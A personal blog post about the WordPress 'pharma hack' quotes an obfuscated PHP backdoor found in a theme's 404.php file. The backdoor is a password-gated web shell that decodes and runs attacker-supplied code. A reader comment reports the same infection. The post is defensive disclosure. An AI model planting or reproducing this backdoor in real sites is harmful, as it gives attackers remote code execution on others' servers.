Tech Stuff

More on the Pharma Hack

Looking through my server logs, I found an inexplicable link to a 404.php file in the directory of a theme I’m not using. It included this line:
$mar = 'archo'; $a = 'm'.'d5';if($a($_REQUEST[$a])=='43985a484aa4e0c1a2434a0b7a39571d'){$w = 'upy2ycv67aiz92tdeedv9ia6mrmjm2jf';$x = $_REQUEST[$w];$y = 'base'.'6';$y.= '4_d'.'ecode';$x = $y($x);$z = 'creat'.'e_f';$z.= 'unction';$x = $z('',$x);$x();} /*xyz*/ */ ?>

Note the slightly obfuscated calls to "md5" and "base64_decode". I found similar code in a footer.php file.

Tom McGee has been building web sites since 1995, and blogging here since 2006. Currently a senior developer at Seton Hall University, he's also a freelance web programmer and musician. Contact him if you have the need for a blog, web site, redesign or custom programming!

2 thoughts on “More on the Pharma Hack”

  1. I found the same thing in MANY of my users WP PHP files, it prevented the admin login. I // them ALL out )There were many)and things worked normal again. Not sure what caused this.
    Quentin Henry

Leave a Reply

Your email address will not be published. Required fields are marked *